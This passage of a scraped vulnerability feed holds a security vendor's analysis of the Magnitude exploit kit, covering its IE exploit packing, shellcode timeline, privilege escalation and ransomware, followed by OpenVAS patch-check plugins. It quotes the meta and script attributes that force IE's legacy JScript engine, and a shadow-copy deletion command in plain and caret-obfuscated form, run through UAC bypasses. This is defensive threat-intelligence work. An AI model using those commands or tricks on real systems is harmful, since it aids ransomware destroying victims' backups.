obfuscation.\n\nCVE-2019-1367 is a Use-After-Free vulnerability due to a garbage collector not tracking a value that was not rooted in the legacy JavaScript engine jscript.dll. By default, Internet Explorer 11 uses Jscript9.dll, but it's still possible to execute the script using the legacy engine by enabling compatibility mode with Internet Explorer 7/8. This can be done with the following script attributes:\n \n \n <meta http-equiv=\"x-ua-compatible\" content=\"IE=EmulateIE8\" />\n <script language=\"JScript.Compact\">\u2026</script>\n \n <meta http-equiv=\"x-ua-compatible\" content=\"IE=EmulateIE8\" />\n <script language=\"JScript.Encode\">\u2026</script>\n\nThe original exploit uses JScript.Compact, a special profile defined for [embedded devices](<https://www.ecma-international.org/publications/files/ECMA-ST-WITHDRAWN/Ecma-327.pdf>). But JScript.Encode is much more interesting because it was developed by Microsoft to protect scripts and prevent source code from being copied. This script attribute can execute scripts encoded with Microsoft Script Encoder (screnc.exe) and it also disables script debugging. Basically, it's a DRM for JavaScript. Magnitude EK changed from its original exploit to take advantage of this feature.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/06/23085029/sl_magnitude_exploit_kit_01.png>)\n\n**_Exploit packed with JScript.Encode technique_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/06/23085053/sl_magnitude_exploit_kit_02.png>)\n\n**_Unpacked exploit. Shellcode, names and some strings are obfuscated_**\n\n## Shellcode\n\nTheir shellcodes piqued my interest. They use a huge number of different shellcode encoders, from the classical Metasploit shikata_ga_nai encoder and DotNetToJScript to a variety of custom encoders and stagers.\n\nIt was also impossible not to notice the changes happening to their main shellcode responsible for launching the ransomware payload. The attackers are fine-tuning their arsenal on a regular basis.\n\nMagnitude EK has existed since at least 2013, but below you can see just the changes to payload/shellcode that occurred over the period of one year (June 2019 to June 2020). During this period we observed attacks happening almost every day.\n\n**Timeline of shellcode/payload changes**\n\nDate | Description \n---|--- \nJune 2019 | Shellcode downloads a payload that's decrypted with a custom xor-based algorithm. All strings are assembled on stack and to change payload the URL shellcode needs to be recompiled. The payload is a PE module. The module export function name is hardcoded to \"GrfeFVGRe\". The payload is executed in an Internet Explorer process. It contains an elevation of privilege exploit with support for x86 and x64 versions of Windows and an encrypted ransomware payload. After elevation of privilege it injects the ransomware payload to other processes, spawns the wuapp.exe process and injects there as well. If process creation fails, it also runs the ransomware from the current process. \nJuly 20, 2019 | Payload module export function name is auto-generated. \nNovember 11, 2019 | Shellcode tries to inject the payload to other processes. If API function Process32First fails, it spawns the process wuapp.exe from Windows directory and injects the payload there. The injection method is WriteProcessMemory + CreateRemoteThread.\n\nThe payload is ransomware without elevation of privilege. The payload module export function name is hardcoded again, but now to \"lssrcdxhg\". \nNovember 20, 2019 | Looks like they messed up the folder with shellcodes; in some attacks they use a shellcode from June, and later the same day they start to use their November shellcode with the new hardcoded export name \"by5eftgdbfgsq323\". \nNovember 23, 2019 | They start to use the elevation of privilege exploit again, but now they also check the integrity level of the process. If it's a low integrity process, then they execute the payload with the exploit in the current process; if that's not the case, then it's injected into other processes. The process is no longer created from shellcode, but it's still created from the payload. The payload module export name is hardcoded to \"gv65eytervsawer2\". \nJanuary 17, 2020 | It looks like the attackers had a short holiday at the beginning of the year. The shellcode remains the same, but the payload module export function name is hardcoded to \"i4eg65tgq3f4\". The payload changed a bit. The name of the created process is now assembled on stack. The name of the process also changed \u2013 it no longer spawns a wuapp.exe, but instead launches the calculator calc.exe and injects the ransomware payload there. \nJanuary 27, 2020 | The payload is no longer a PE module but plain shellcode. The payload consists of ransomware without elevation of privilege. \nFebruary 4, 2020 | The payload is a PE module again, but once again the export name is auto-generated. \nFebruary 10, 2020 | The shellcode comes with two URLs for different payloads. The shellcode checks the integrity level and depending on process integrity level, it executes the elevation of privilege payload or uses the ransomware payload straightaway. All strings and function imports in the exploit are now obfuscated. The payload does not spawn a new process, and only injects to others. \nFebruary 11, 2020 | Magnitude EK starts using CVE-2019-1367 as its primary exploit. The attackers use the shellcode from January 27, 2020, but they have modified it to check for the name of a particular process. If the process exists, they don't execute the payload from Internet Explorer. The process name is \"ASDSvc\" (AhnLab, Inc.). \nFebruary 17, 2020 | The attackers switch to the shellcode from February 10, 2020, but the payload module export function name is hardcoded to \"xs324qsawezzse\". \nFebruary 28, 2020 | Shellcode encryption is removed. The payload module export function name is hardcoded to \"sawd6vf3y5\". \nMarch 1, 2020 | Strings are no longer stored on stack. \nMarch 6, 2020 | Back to the shellcode from February 17, 2020. \nMarch 10, 2020 | The attackers add some functionality implemented after February 17, 2020: payload encryption is removed and strings are no longer stored on stack. The payload module export function name is still hardcoded to \"xs324qsawezzse\". \nMarch 16, 2020 | Functionality added so as not to inject into a particular process (explorer.exe). The injection method is also changed to NtCreateSection + NtMapViewOfSection + RtlCreateUserThread. \nApril 2, 2020 | The attackers add some functionality similar to that used in November 2019. They check the integrity level of a process and if it's a low integrity process, they execute the payload from the current process. If that's not the case, they inject it to other processes (other than explorer.exe) and at the end create a new process and inject it there as well. The created processes are C:\\Program Files\\Windows Media Player\\wmlaunch.exe or C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe depending on whether it's a WOW64 process or not. \nApril 4, 2020 | Shellcode updated to use a new injection technique: NtQueueApcThread. The shellcode also comes with a URL for a ransomware payload without elevation of privilege. The shellcode checks the integrity level and if it's a low integrity process, the shellcode calls ExitProcess(). Use of the hardcoded export name \"xs324qsawezzse\" is also stopped. \nApril 7, 2020 | Back to the shellcode from April 2, 2020. \nMay 5, 2020 | Previously the attackers adjusted their injection method, but now they revert back to injection via the WriteProcessMemory + CreateRemoteThread technique. \nMay 6, 2020 | They continue to make changes to the code injection method. From now on they use NtCreateThreadEx. \n \n \n\n## Elevation of privilege exploit\n\nThe elevation of privilege exploit used by Magnitude EK is quite interesting. When I saw it for the first time, I wasn't able to recognize this particular exploit. It exploited a vulnerability in the win32k kernel driver and closer analysis revealed that this particular vulnerability was fixed in December 2018. According to Microsoft, only two win32k-related elevation of privilege vulnerabilities were fixed that month \u2013 CVE-2018-8639 and CVE-2018-8641. Microsoft previously shared more information with us about CVE-2018-8639, so we can say with some certainty that the encountered exploit uses vulnerability CVE-2018-8641. The exploit has huge code similarities with another zero-day that we had found previously \u2013 [CVE-2019-0859](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>). Based on these similarities, we attribute this exploit to the prolific exploit writer known as \"Volodya\", \"Volodimir\" or \"BuggiCorp\". Volodya is famous for selling zero-day exploits to both APT groups and criminals. In the past, Volodya advertised his services at exploit(dot)in, the same underground forum where Magnitude EK was once advertised. We don't currently know if the exploit for CVE-2018-8641 was initially used as a zero-day exploit or it was developed as a 1-day exploit through patch diffing. It's also important to note that a public exploit for CVE-2018-8641 also exists, but it's incorrectly designated to CVE-2018-8639 and it exploits the vulnerability in another fashion, meaning there are two completely different exploits for the same vulnerability.\n\n## Ransomware\n\nMagnitude EK uses its own ransomware as its final payload. The ransomware comes with a temporary encryption key and list of domain names and the attackers change them frequently. Files are encrypted with the use of Microsoft CryptoAPI and the attackers use Microsoft Enhanced RSA and AES Cryptographic Provider (PROV_RSA_AES). The initialization vector (IV) is generated pseudo randomly for each file and a 0x100 byte long blob with encrypted IV is appended to the end of the file. The ransomware doesn't encrypt the files located in common folders such as documents and settings, appdata, local settings, sample music, tor browser, etc. Before encryption, the extensions of files are checked against a hash table of allowed file extensions that contains 715 entries. A ransom note is left in each folder with encrypted files and at the end a notepad.exe process is created to display the ransom note. To hide the origin of the executed process, the ransomware uses one of two techniques: \"wmic process call create\" or \"pcalua.exe \u2013a \u2026 -c \u2026\". After encryption the ransomware also attempts to delete backups of the files with the \"wmic shadowcopy delete\" command that is executed with a UAC-bypass.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/06/23085326/sl_magnitude_exploit_kit_03-1.png>)\n\n_**Example of Magnitude EK ransom note**_\n\nThe core of the ransomware did not undergo many changes throughout the year. If we compare old samples with more recent versions, there are only a few notable changes:\n\n * In older versions, immediately at launch the payload gets the default UI language of the operating system using the GetSystemDefaultUILanguage API function and compares the returned value against a couple of hardcoded language IDs (e.g. zh-HK - Hong Kong S.A.R., zh-MO - Macao S.A.R., zh-CN - People's Republic of China, zh-SG - Singapore, zh-TW - Taiwan, ko-KR - Korea, ms-BN - Brunei Darussalam, ms-MY - Malaysia). If the language ID doesn't match, then ExitProcess() will be executed. In newer versions, the check for the language ID was removed.\n * In older versions, the ransomware deletes file backups with the command \"cmd.exe /c \"%SystemRoot%\\system32\\wbem\\wmic shadowcopy delete\" via UAC-bypass in eventvwr.exe. In the newer version, the command is obfuscated with caret character insertion \"cmd.exe /c \"%SystemRoot%\\system32\\wbem\\wmic ^s^h^a^d^o^w^c^o^p^y^ ^d^e^l^e^t^e\" and executed via UAC-bypass in CompMgmtLauncher.exe.\n\n## Conclusions\n\nThe total volume of attacks performed by exploit kits has decreased, but they still exist, are still active, and still pose a threat, and therefore need to be treated seriously. Magnitude is not the only active exploit kit and we see other exploit kits that are also switching to newer exploits for Internet Explorer. We recommend installing security updates, migrating to a newer operating system (make sure you stay up to date with Windows 10 builds) and also not using Internet Explorer as your web browser. Throughout the entire Magnitude EK campaign we have detected the use of Internet Explorer exploits with the verdict PDM:Exploit.Win32.Generic.", "modified": "2020-06-24T10:00:16", "published": "2020-06-24T10:00:16", "id": "SECURELIST:78C1216872C5187377E9C874AEDF73FC", "href": "https://securelist.com/magnitude-exploit-kit-evolution/97436/", "type": "securelist", "title": "Magnitude exploit kit \u2013 evolution", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-07-21T20:40:44", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4525235", "modified": "2020-07-17T00:00:00", "published": "2019-11-13T00:00:00", "id": "OPENVAS:1361412562310815839", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815839", "title": "Microsoft Windows Multiple Vulnerabilities (KB4525235)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815839\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2018-12207\", \"CVE-2019-0712\", \"CVE-2019-0719\", \"CVE-2019-11135\",\n \"CVE-2019-1382\", \"CVE-2019-1384\", \"CVE-2019-1388\", \"CVE-2019-1389\",\n \"CVE-2019-1390\", \"CVE-2019-1391\", \"CVE-2019-1393\", \"CVE-2019-1394\",\n \"CVE-2019-1395\", \"CVE-2019-1396\", \"CVE-2019-1397\", \"CVE-2019-1399\",\n \"CVE-2019-1405\", \"CVE-2019-1406\", \"CVE-2019-1407\", \"CVE-2019-1408\",\n \"CVE-2019-1409\", \"CVE-2019-1411\", \"CVE-2019-1412\", \"CVE-2019-1415\",\n \"CVE-2019-1418\", \"CVE-2019-1419\", \"CVE-2019-1422\", \"CVE-2019-1424\",\n \"CVE-2019-1429\", \"CVE-2019-1432\", \"CVE-2019-1433\", \"CVE-2019-1434\",\n \"CVE-2019-1435\", \"CVE-2019-1438\", \"CVE-2019-1439\", \"CVE-2019-1441\",\n \"CVE-2019-1456\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-11-13 09:00:35 +0530 (Wed, 13 Nov 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4525235)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4525235\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the\n target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows improperly handles objects in memory.\n\n - Microsoft Hyper-V Network Switch on a host server fails to properly validate\n input from a privileged user on a guest operating system.\n\n - Windows kernel improperly handles objects in memory.\n\n - ActiveX Installer service may allow access to files without proper authentication.\n\n - Windows Certificate Dialog does not properly enforce user privileges.\n\n - VBScript engine improperly handles objects in memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code on a victim system, cause a target system to stop\n responding, obtain information to further compromise the user's system\n and gain elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4525235\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\ndllPath = smb_get_system32root();\nif(!dllPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:dllPath, file_name:\"Advapi32.dll\");\nif(!fileVer)\n exit(0);\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24535\")) {\n report = report_fixed_ver(file_checked:dllPath + \"\\Advapi32.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24535\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:43", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4525232", "modified": "2020-07-17T00:00:00", "published": "2019-11-13T00:00:00", "id": "OPENVAS:1361412562310815834", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815834", "title": "Microsoft Windows Multiple Vulnerabilities (KB4525232)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815834\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2018-12207\", \"CVE-2019-0712\", \"CVE-2019-0719\", \"CVE-2019-11135\",\n \"CVE-2019-1380\", \"CVE-2019-1381\", \"CVE-2019-1382\", \"CVE-2019-1383\",\n \"CVE-2019-1384\", \"CVE-2019-1388\", \"CVE-2019-1389\", \"CVE-2019-1390\",\n \"CVE-2019-1391\", \"CVE-2019-1392\", \"CVE-2019-1393\", \"CVE-2019-1394\",\n \"CVE-2019-1395\", \"CVE-2019-1396\", \"CVE-2019-1397\", \"CVE-2019-1405\",\n \"CVE-2019-1406\", \"CVE-2019-1407\", \"CVE-2019-1408\", \"CVE-2019-1409\",\n \"CVE-2019-1411\", \"CVE-2019-1415\", \"CVE-2019-1417\", \"CVE-2019-1418\",\n \"CVE-2019-1419\", \"CVE-2019-1420\", \"CVE-2019-1422\", \"CVE-2019-1424\",\n \"CVE-2019-1426\", \"CVE-2019-1429\", \"CVE-2019-1433\", \"CVE-2019-1434\",\n \"CVE-2019-1435\", \"CVE-2019-1436\", \"CVE-2019-1438\", \"CVE-2019-1439\",\n \"CVE-2019-1456\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-11-13 09:04:24 +0530 (Wed, 13 Nov 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4525232)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4525232\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Microsoft Hyper-V Network Switch on a host server fails to properly\n validate input from a privileged user on a guest operating system.\n\n - Windows Installer improperly handles certain filesystem operations.\n\n - Windows Universal Plug and Play (UPnP) service improperly allows COM\n object creation.\n\n - Windows Jet Database Engine improperly handles objects in memory.\n\n - Windows Graphics Component improperly handles objects in memory.\n\n - Scripting engine improperly handles objects in memory in Internet Explorer.\n\n - Windows Netlogon improperly handles a secure communications channel.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash the host server, execute code with elevated permissions, bypass security\n restrictions, and disclose sensitive information to further compromise the user's\n system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4525232\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Crypt32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.10240.0\", test_version2:\"10.0.10240.18394\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Crypt32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.10240.0 - 10.0.10240.18394\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:39", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4525241", "modified": "2020-07-17T00:00:00", "published": "2019-11-13T00:00:00", "id": "OPENVAS:1361412562310815720", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815720", "title": "Microsoft Windows Multiple Vulnerabilities (KB4525241)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815720\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2018-12207\", \"CVE-2019-0712\", \"CVE-2019-0721\", \"CVE-2019-11135\",\n \"CVE-2019-1422\", \"CVE-2019-1424\", \"CVE-2019-1426\", \"CVE-2019-1309\",\n \"CVE-2019-1324\", \"CVE-2019-1374\", \"CVE-2019-1380\", \"CVE-2019-1428\",\n \"CVE-2019-1429\", \"CVE-2019-1381\", \"CVE-2019-1382\", \"CVE-2019-1383\",\n \"CVE-2019-1433\", \"CVE-2019-1435\", \"CVE-2019-1436\", \"CVE-2019-1384\",\n \"CVE-2019-1385\", \"CVE-2019-1388\", \"CVE-2019-1389\", \"CVE-2019-1438\",\n \"CVE-2019-1439\", \"CVE-2019-1440\", \"CVE-2019-1390\", \"CVE-2019-1391\",\n \"CVE-2019-1393\", \"CVE-2019-1394\", \"CVE-2019-1395\", \"CVE-2019-1456\",\n \"CVE-2019-1396\", \"CVE-2019-1397\", \"CVE-2019-1398\", \"CVE-2019-1406\",\n \"CVE-2019-1407\", \"CVE-2019-1408\", \"CVE-2019-1409\", \"CVE-2019-1411\",\n \"CVE-2019-1413\", \"CVE-2019-1415\", \"CVE-2019-1416\", \"CVE-2019-1417\",\n \"CVE-2019-1418\", \"CVE-2019-1419\", \"CVE-2019-1420\", \"CVE-2019-1399\",\n \"CVE-2019-1405\", \"CVE-2019-0719\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-11-13 09:47:51 +0530 (Wed, 13 Nov 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4525241)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4525241\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Windows improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Windows TCP/IP stack improperly handles IPv6 flowlabel filled in packets.\n\n - Scripting engine improperly handles objects in memory in Internet Explorer.\n\n - Windows Servicing Stack allows access to unprivileged file locations.\n\n - ActiveX Installer service allows access to files without proper authentication.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, gain access to sensitive data, elevate\n privileges and conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4525241\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer)\n exit(0);\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.1503\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.1503\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:49", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4525236", "modified": "2020-07-17T00:00:00", "published": "2019-11-13T00:00:00", "id": "OPENVAS:1361412562310815836", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815836", "title": "Microsoft Windows Multiple Vulnerabilities (KB4525236)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815836\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2018-12207\", \"CVE-2019-0712\", \"CVE-2019-0719\", \"CVE-2019-11135\",\n \"CVE-2019-1374\", \"CVE-2019-1380\", \"CVE-2019-1381\", \"CVE-2019-1382\",\n \"CVE-2019-1383\", \"CVE-2019-1384\", \"CVE-2019-1388\", \"CVE-2019-1389\",\n \"CVE-2019-1390\", \"CVE-2019-1391\", \"CVE-2019-1393\", \"CVE-2019-1394\",\n \"CVE-2019-1395\", \"CVE-2019-1396\", \"CVE-2019-1397\", \"CVE-2019-1399\",\n \"CVE-2019-1405\", \"CVE-2019-1406\", \"CVE-2019-1407\", \"CVE-2019-1408\",\n \"CVE-2019-1409\", \"CVE-2019-1411\", \"CVE-2019-1413\", \"CVE-2019-1415\",\n \"CVE-2019-1417\", \"CVE-2019-1418\", \"CVE-2019-1419\", \"CVE-2019-1420\",\n \"CVE-2019-1422\", \"CVE-2019-1424\", \"CVE-2019-1426\", \"CVE-2019-1428\",\n \"CVE-2019-1429\", \"CVE-2019-1433\", \"CVE-2019-1435\", \"CVE-2019-1436\",\n \"CVE-2019-1438\", \"CVE-2019-1439\", \"CVE-2019-1456\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-11-13 10:06:52 +0530 (Wed, 13 Nov 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4525236)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4525236\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft Hyper-V Network Switch on a host server fails to properly\n validate input from a privileged user on a guest operating system.\n\n - Windows Installer fails to properly handles certain filesystem operations.\n\n - Windows Error Reporting (WER) improperly handles objects in memory.\n\n - Windows Universal Plug and Play (UPnP) service improperly allows COM object\n creation.\n\n - Windows Jet Database Engine improperly handles objects in memory.\n\n - Windows Graphics Component improperly handles objects in memory.\n\n - Scripting engine handles objects in memory in Internet Explorer.\n\n - Windows Netlogon improperly handles a secure communications channel.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Remote Procedure Call (RPC) runtime improperly initializes objects\n in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash host server, execute code with elevated permissions, obtain information\n to further compromise the user's system and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please 